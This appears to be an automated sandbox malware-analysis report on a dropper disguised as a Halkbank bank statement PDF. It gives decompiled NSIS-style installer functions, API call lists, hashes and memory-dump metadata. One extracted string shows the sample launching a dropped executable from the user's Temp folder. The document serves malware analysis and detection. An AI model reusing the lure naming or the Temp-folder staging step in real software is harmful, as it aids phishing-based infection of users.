                                                                    0x004053e3
                                                                    0x004053ed
                                                                    0x004053f2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405404
                                                                    0x00405409
                                                                    0x00405415
                                                                    0x00405415
                                                                    0x00405417
                                                                    0x00405426
                                                                    0x00405428
                                                                    0x0040542c
                                                                    0x0040542f
                                                                    0x00000000
                                                                    0x0040542f
                                                                    0x004053cd
                                                                    0x00405083
                                                                    0x00405088
                                                                    0x00405091
                                                                    0x00405098
                                                                    0x004050aa
                                                                    0x004050b5
                                                                    0x004050bb
                                                                    0x004050c9
                                                                    0x004050dd
                                                                    0x004050e2
                                                                    0x004050ef
                                                                    0x004050f4
                                                                    0x0040510a
                                                                    0x0040511b
                                                                    0x00405128
                                                                    0x00405128
                                                                    0x0040512b
                                                                    0x00405131
                                                                    0x00405133
                                                                    0x00405136
                                                                    0x0040513b
                                                                    0x00405140
                                                                    0x00405142
                                                                    0x00405142
                                                                    0x00405162
                                                                    0x00405162
                                                                    0x00405164
                                                                    0x00405165
                                                                    0x0040516a
                                                                    0x00405170
                                                                    0x00405174
                                                                    0x00405179
                                                                    0x00405181
                                                                    0x00405185
                                                                    0x0040518a
                                                                    0x0040518f
                                                                    0x00405197
                                                                    0x0040519a
                                                                    0x0040526a
                                                                    0x0040527d
                                                                    0x00000000
                                                                    0x004051a0
                                                                    0x004051a3
                                                                    0x004051a6
                                                                    0x004051a9
                                                                    0x004051a9
                                                                    0x004051af
                                                                    0x004051b8
                                                                    0x004051bb
                                                                    0x004051bf
                                                                    0x004051c2
                                                                    0x004051c5
                                                                    0x004051ce
                                                                    0x004051d7
                                                                    0x004051da
                                                                    0x004051dd
                                                                    0x004051e0
                                                                    0x0040521e
                                                                    0x00405249
                                                                    0x00405220
                                                                    0x0040522f
                                                                    0x0040522f
                                                                    0x004051e2
                                                                    0x004051e5
                                                                    0x004051f3
                                                                    0x004051fd
                                                                    0x00405205
                                                                    0x0040520c
                                                                    0x00405217
                                                                    0x00405217
                                                                    0x004051e0
                                                                    0x0040524f
                                                                    0x00405250
                                                                    0x0040525c
                                                                    0x0040525c
                                                                    0x00405268
                                                                    0x00405283
                                                                    0x00405286
                                                                    0x004052a3
                                                                    0x00000000
                                                                    0x00405288
                                                                    0x0040528d
                                                                    0x00405296
                                                                    0x00405629
                                                                    0x0040563b
                                                                    0x0040563b
                                                                    0x00405286
                                                                    0x00000000
                                                                    0x00405268
                                                                    0x0040519a

                                                                    APIs
                                                                    • GetDlgItem.USER32 ref: 00405049
                                                                    • GetDlgItem.USER32 ref: 00405054
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                    • LoadImageW.USER32 ref: 004050B5
                                                                    • SetWindowLongW.USER32 ref: 004050CE
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                    • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                    • SetWindowLongW.USER32 ref: 0040527D
                                                                    • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                    • GlobalFree.KERNEL32 ref: 0040546B
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                    • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                    • GetDlgItem.USER32 ref: 00405620
                                                                    • ShowWindow.USER32(00000000), ref: 00405627
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 2564846305-813528018
                                                                    • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                    • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                    • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                    • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                    				intOrPtr _v8;
                                                                    				int _v12;
                                                                    				void* _v16;
                                                                    				struct HWND__* _t56;
                                                                    				signed int _t75;
                                                                    				signed short* _t76;
                                                                    				signed short* _t78;
                                                                    				long _t92;
                                                                    				int _t103;
                                                                    				signed int _t110;
                                                                    				intOrPtr _t113;
                                                                    				WCHAR* _t114;
                                                                    				signed int* _t116;
                                                                    				WCHAR* _t117;
                                                                    				struct HWND__* _t118;
                                                                    
                                                                    				if(_a8 != 0x110) {
                                                                    					if(_a8 != 0x111) {
                                                                    						L13:
                                                                    						if(_a8 != 0x4e) {
                                                                    							if(_a8 == 0x40b) {
                                                                    								 *0x421714 =  *0x421714 + 1;
                                                                    							}
                                                                    							L27:
                                                                    							_t114 = _a16;
                                                                    							L28:
                                                                    							return E0040462B(_a8, _a12, _t114);
                                                                    						}
                                                                    						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                    						_t114 = _a16;
                                                                    						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                    							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                    							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                    							_v12 = _t103;
                                                                    							_v16 = _t113;
                                                                    							_v8 = 0x428200;
                                                                    							if(_t103 - _t113 < 0x800) {
                                                                    								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                    								SetCursor(LoadCursorW(0, 0x7f02));
                                                                    								_push(1);
                                                                    								E00404A32(_a4, _v8);
                                                                    								SetCursor(LoadCursorW(0, 0x7f00));
                                                                    								_t114 = _a16;
                                                                    							}
                                                                    						}
                                                                    						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                    							goto L28;
                                                                    						} else {
                                                                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                    								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                                    							}
                                                                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                    								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                                    							}
                                                                    							return 1;
                                                                    						}
                                                                    					}
                                                                    					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                                    						goto L27;
                                                                    					} else {
                                                                    						_t116 =  *0x422720 + 0x14;
                                                                    						if(( *_t116 & 0x00000020) == 0) {
                                                                    							goto L27;
                                                                    						}
                                                                    						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                    						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                    						E00404A0E();
                                                                    						goto L13;
                                                                    					}
                                                                    				}
                                                                    				_t117 = _a16;
                                                                    				_t75 =  *(_t117 + 0x30);
                                                                    				if(_t75 < 0) {
                                                                    					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                                    				}
                                                                    				_t76 =  *0x42a298 + _t75 * 2;
                                                                    				_t110 =  *_t76 & 0x0000ffff;
                                                                    				_a8 = _t110;
                                                                    				_t78 =  &(_t76[1]);
                                                                    				_a16 = _t78;
                                                                    				_v16 = _t78;
                                                                    				_v12 = 0;
                                                                    				_v8 = E00404734;
                                                                    				if(_t110 != 2) {
                                                                    					_v8 = E004046FA;
                                                                    				}
                                                                    				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                    				_push(0x22);
                                                                    				E004045C4(_a4);
                                                                    				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                    				_push(0x23);
                                                                    				E004045C4(_a4);
                                                                    				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                    				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                    				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                    				E004045F9(_t118);
                                                                    				SendMessageW(_t118, 0x45b, 1, 0);
                                                                    				_t92 =  *( *0x42a270 + 0x68);
                                                                    				if(_t92 < 0) {
                                                                    					_t92 = GetSysColor( ~_t92);
                                                                    				}
                                                                    				SendMessageW(_t118, 0x443, 0, _t92);
                                                                    				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                    				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                    				 *0x421714 = 0;
                                                                    				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                    				 *0x421714 = 0;
                                                                    				return 0;
                                                                    			}


















                                                                    0x00404795
                                                                    0x004048c2
                                                                    0x0040491f
                                                                    0x00404923
                                                                    0x004049f0
                                                                    0x004049f2
                                                                    0x004049f2
                                                                    0x004049f8
                                                                    0x004049f8
                                                                    0x004049fb
                                                                    0x00000000
                                                                    0x00404a02
                                                                    0x00404931
                                                                    0x00404937
                                                                    0x00404941
                                                                    0x0040494c
                                                                    0x0040494f
                                                                    0x00404952
                                                                    0x0040495d
                                                                    0x00404960
                                                                    0x00404967
                                                                    0x00404974
                                                                    0x00404985
                                                                    0x0040498b
                                                                    0x00404993
                                                                    0x004049a1
                                                                    0x004049a7
                                                                    0x004049a7
                                                                    0x00404967
                                                                    0x004049b1
                                                                    0x00000000
                                                                    0x004049bc
                                                                    0x004049c0
                                                                    0x004049d0
                                                                    0x004049d0
                                                                    0x004049d6
                                                                    0x004049e2
                                                                    0x004049e2
                                                                    0x00000000
                                                                    0x004049e6
                                                                    0x004049b1
                                                                    0x004048cd
                                                                    0x00000000
                                                                    0x004048df
                                                                    0x004048e4
                                                                    0x004048ea
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404913
                                                                    0x00404915
                                                                    0x0040491a
                                                                    0x00000000
                                                                    0x0040491a
                                                                    0x004048cd
                                                                    0x0040479b
                                                                    0x0040479e
                                                                    0x004047a3
                                                                    0x004047b4
                                                                    0x004047b4
                                                                    0x004047bc
                                                                    0x004047bf
                                                                    0x004047c3
                                                                    0x004047c6
                                                                    0x004047ca
                                                                    0x004047cd
                                                                    0x004047d0
                                                                    0x004047d3
                                                                    0x004047da
                                                                    0x004047dc
                                                                    0x004047dc
                                                                    0x004047e6
                                                                    0x004047f3
                                                                    0x004047fd
                                                                    0x00404802
                                                                    0x00404805
                                                                    0x0040480a
                                                                    0x00404821
                                                                    0x00404828
                                                                    0x0040483b
                                                                    0x0040483e
                                                                    0x00404852
                                                                    0x00404859
                                                                    0x0040485e
                                                                    0x00404863
                                                                    0x00404863
                                                                    0x00404871
                                                                    0x0040487f
                                                                    0x00404891
                                                                    0x00404896
                                                                    0x004048a6
                                                                    0x004048a8
                                                                    0x00000000

                                                                    APIs
                                                                    • CheckDlgButton.USER32 ref: 00404821
                                                                    • GetDlgItem.USER32 ref: 00404835
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                    • GetSysColor.USER32(?), ref: 00404863
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                    • lstrlenW.KERNEL32(?), ref: 00404884
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                    • GetDlgItem.USER32 ref: 004048FF
                                                                    • SendMessageW.USER32(00000000), ref: 00404906
                                                                    • GetDlgItem.USER32 ref: 00404931
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                    • SetCursor.USER32(00000000), ref: 00404985
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                    • SetCursor.USER32(00000000), ref: 004049A1
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                    Strings
                                                                    • "C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj, xrefs: 00404960
                                                                    • N, xrefs: 0040491F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj$N
                                                                    • API String ID: 3103080414-2916006976
                                                                    • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                    • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                    • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                    • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004062AE(void* __ecx) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				long _t12;
                                                                    				long _t24;
                                                                    				char* _t31;
                                                                    				int _t37;
                                                                    				void* _t38;
                                                                    				intOrPtr* _t39;
                                                                    				long _t42;
                                                                    				WCHAR* _t44;
                                                                    				void* _t46;
                                                                    				void* _t48;
                                                                    				void* _t49;
                                                                    				void* _t52;
                                                                    				void* _t53;
                                                                    
                                                                    				_t38 = __ecx;
                                                                    				_t44 =  *(_t52 + 0x14);
                                                                    				 *0x426de8 = 0x55004e;
                                                                    				 *0x426dec = 0x4c;
                                                                    				if(_t44 == 0) {
                                                                    					L3:
                                                                    					_t2 = _t52 + 0x1c; // 0x4275e8
                                                                    					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                                    					if(_t12 != 0 && _t12 <= 0x400) {
                                                                    						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                                    						_t53 = _t52 + 0x10;
                                                                    						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                                    						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                                    						_t48 = _t12;
                                                                    						 *(_t53 + 0x18) = _t48;
                                                                    						if(_t48 != 0xffffffff) {
                                                                    							_t42 = GetFileSize(_t48, 0);
                                                                    							_t6 = _t37 + 0xa; // 0xa
                                                                    							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                    							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                                    								L18:
                                                                    								return CloseHandle(_t48);
                                                                    							} else {
                                                                    								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                    									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                                    									if(_t49 == 0) {
                                                                    										_t48 =  *(_t53 + 0x18);
                                                                    										L16:
                                                                    										_t24 = _t42;
                                                                    										L17:
                                                                    										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                                    										SetFilePointer(_t48, 0, 0, 0);
                                                                    										E0040620A(_t48, _t46, _t42 + _t37);
                                                                    										GlobalFree(_t46);
                                                                    										goto L18;
                                                                    									}
                                                                    									_t39 = _t46 + _t42;
                                                                    									_t31 = _t39 + _t37;
                                                                    									while(_t39 > _t49) {
                                                                    										 *_t31 =  *_t39;
                                                                    										_t31 = _t31 - 1;
                                                                    										_t39 = _t39 - 1;
                                                                    									}
                                                                    									_t24 = _t49 - _t46 + 1;
                                                                    									_t48 =  *(_t53 + 0x18);
                                                                    									goto L17;
                                                                    								}
                                                                    								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                    								_t42 = _t42 + 0xa;
                                                                    								goto L16;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					CloseHandle(E00406158(_t44, 0, 1));
                                                                    					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                                    					if(_t12 != 0 && _t12 <= 0x400) {
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    				return _t12;
                                                                    			}



















                                                                    0x004062ae
                                                                    0x004062b7
                                                                    0x004062be
                                                                    0x004062c8
                                                                    0x004062dc
                                                                    0x00406304
                                                                    0x0040630b
                                                                    0x0040630f
                                                                    0x00406313
                                                                    0x00406333
                                                                    0x0040633a
                                                                    0x00406344
                                                                    0x00406351
                                                                    0x00406356
                                                                    0x0040635b
                                                                    0x0040635f
                                                                    0x0040636e
                                                                    0x00406370
                                                                    0x0040637d
                                                                    0x00406381
                                                                    0x0040641c
                                                                    0x00000000
                                                                    0x00406397
                                                                    0x004063a4
                                                                    0x004063c8
                                                                    0x004063cc
                                                                    0x004063eb
                                                                    0x004063ef
                                                                    0x004063ef
                                                                    0x004063f1
                                                                    0x004063fa
                                                                    0x00406405
                                                                    0x00406410
                                                                    0x00406416
                                                                    0x00000000
                                                                    0x00406416
                                                                    0x004063ce
                                                                    0x004063d1
                                                                    0x004063dc
                                                                    0x004063d8
                                                                    0x004063da
                                                                    0x004063db
                                                                    0x004063db
                                                                    0x004063e3
                                                                    0x004063e5
                                                                    0x00000000
                                                                    0x004063e5
                                                                    0x004063af
                                                                    0x004063b5
                                                                    0x00000000
                                                                    0x004063b5
                                                                    0x00406381
                                                                    0x0040635f
                                                                    0x004062de
                                                                    0x004062e9
                                                                    0x004062f2
                                                                    0x004062f6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004062f6
                                                                    0x00406427

                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                    • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                      • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                    • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                                    • wsprintfA.USER32 ref: 0040632D
                                                                    • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                    • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                    • GlobalFree.KERNEL32 ref: 00406416
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                    • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                    • API String ID: 2171350718-2295842750
                                                                    • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                    • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                    • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                    • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                    				struct tagLOGBRUSH _v16;
                                                                    				struct tagRECT _v32;
                                                                    				struct tagPAINTSTRUCT _v96;
                                                                    				struct HDC__* _t70;
                                                                    				struct HBRUSH__* _t87;
                                                                    				struct HFONT__* _t94;
                                                                    				long _t102;
                                                                    				signed int _t126;
                                                                    				struct HDC__* _t128;
                                                                    				intOrPtr _t130;
                                                                    
                                                                    				if(_a8 == 0xf) {
                                                                    					_t130 =  *0x42a270;
                                                                    					_t70 = BeginPaint(_a4,  &_v96);
                                                                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                    					_a8 = _t70;
                                                                    					GetClientRect(_a4,  &_v32);
                                                                    					_t126 = _v32.bottom;
                                                                    					_v32.bottom = _v32.bottom & 0x00000000;
                                                                    					while(_v32.top < _t126) {
                                                                    						_a12 = _t126 - _v32.top;
                                                                    						asm("cdq");
                                                                    						asm("cdq");
                                                                    						asm("cdq");
                                                                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                    						_t87 = CreateBrushIndirect( &_v16);
                                                                    						_v32.bottom = _v32.bottom + 4;
                                                                    						_a16 = _t87;
                                                                    						FillRect(_a8,  &_v32, _t87);
                                                                    						DeleteObject(_a16);
                                                                    						_v32.top = _v32.top + 4;
                                                                    					}
                                                                    					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                    						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                    						_a16 = _t94;
                                                                    						if(_t94 != 0) {
                                                                    							_t128 = _a8;
                                                                    							_v32.left = 0x10;
                                                                    							_v32.top = 8;
                                                                    							SetBkMode(_t128, 1);
                                                                    							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                    							_a8 = SelectObject(_t128, _a16);
                                                                    							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                                    							SelectObject(_t128, _a8);
                                                                    							DeleteObject(_a16);
                                                                    						}
                                                                    					}
                                                                    					EndPaint(_a4,  &_v96);
                                                                    					return 0;
                                                                    				}
                                                                    				_t102 = _a16;
                                                                    				if(_a8 == 0x46) {
                                                                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                    					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                                    				}
                                                                    				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                    			}













                                                                    0x0040100a
                                                                    0x00401039
                                                                    0x00401047
                                                                    0x0040104d
                                                                    0x00401051
                                                                    0x0040105b
                                                                    0x00401061
                                                                    0x00401064
                                                                    0x004010f3
                                                                    0x00401089
                                                                    0x0040108c
                                                                    0x004010a6
                                                                    0x004010bd
                                                                    0x004010cc
                                                                    0x004010cf
                                                                    0x004010d5
                                                                    0x004010d9
                                                                    0x004010e4
                                                                    0x004010ed
                                                                    0x004010ef
                                                                    0x004010ef
                                                                    0x00401100
                                                                    0x00401105
                                                                    0x0040110d
                                                                    0x00401110
                                                                    0x00401112
                                                                    0x00401118
                                                                    0x0040111f
                                                                    0x00401126
                                                                    0x00401130
                                                                    0x00401142
                                                                    0x00401156
                                                                    0x00401160
                                                                    0x00401165
                                                                    0x00401165
                                                                    0x00401110
                                                                    0x0040116e
                                                                    0x00000000
                                                                    0x00401178
                                                                    0x00401010
                                                                    0x00401013
                                                                    0x00401015
                                                                    0x0040101f
                                                                    0x0040101f
                                                                    0x00000000

                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
